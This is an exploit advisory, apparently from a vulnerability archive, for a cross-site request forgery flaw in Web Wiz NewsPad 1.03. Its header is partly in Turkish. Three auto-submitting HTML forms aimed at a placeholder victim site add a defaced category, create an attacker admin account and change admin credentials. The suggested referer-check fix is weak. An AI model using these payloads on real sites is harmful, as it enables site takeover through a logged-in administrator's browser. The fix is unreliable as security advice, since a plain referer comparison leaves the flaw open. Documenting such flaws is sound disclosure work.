< ------------------- header data start ------------------- >

#############################################################

# Application Name : Web Wiz NewsPad 1.03

# Vulnerable Type : XSRF

# Risk : High

# Infection : Uzaktan gönderilen Request istekeleri databese e islenmektedir.

# Bug Fix Advice : Database e insert islemi yapilmadan önceki satira HTTP_REFERER kontrolü eklenmeli.

< -- BugFix code start -- >
CWBugReserachersEqu = Request.Servervariables(HTTP_REFERER)
If Not CWBugReserachersEqu = yoursitename.com Then
Response.Redirect Default.asp
Response.End
End if
< -- BugFix code End -- >

# author : Bug Researchers/Equilibrium

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >
’ XSRF Category Add
<bOdy onload=document.frmNewForum.submit()>
<form id=frmNewForum name=frmNewForum method=post action=http://victim-site.com/newspad/admin_category_details.asp?CatID=0>
<input type=hidden value=new name=mode>
<input type=hidden value=true name=postBack>
<input maxLength=30 size=25 name=category value=Write Hacked By Attacker or Redirect code>
</form>
</bOdy>

< ------------------------------------------------------------------------------------------------- >

’ XSRF Admin User Add
<bOdy onload=document.frmChangepassword.submit()>
<form id=frmChangepassword name=frmChangepassword method=post action=http://victim-site.com/newspad/admin_add_admin_user.asp>
<input maxLength=15 size=15 name=name2 value=Attackerusername> </td>
<input type=password maxLength=15 size=15 value=Attackerpass name=password>
<input type=password maxLength=15 size=15 value=Attackerpass name=password2>
<input type=hidden value=true name=postBack>
</form>
</bOdy>

< ------------------------------------------------------------------------------------------------- >

’ XSRF Admin Change password
<bOdy onload=document.frmChangepassword.submit()>
<form id=frmChangepassword name=frmChangepassword method=post action=http://victim-site.com/newspad/admin_change_username.asp>
<input maxLength=15 size=15 name=name2 value=Attackerusername> </td>
<input type=password maxLength=15 size=15 value=Attackerpass name=password>
<input type=password maxLength=15 size=15 value=Attackerpass name=password2>
<input type=hidden value=true name=postBack>
</form>
</bOdy>
< -- bug code end of -- >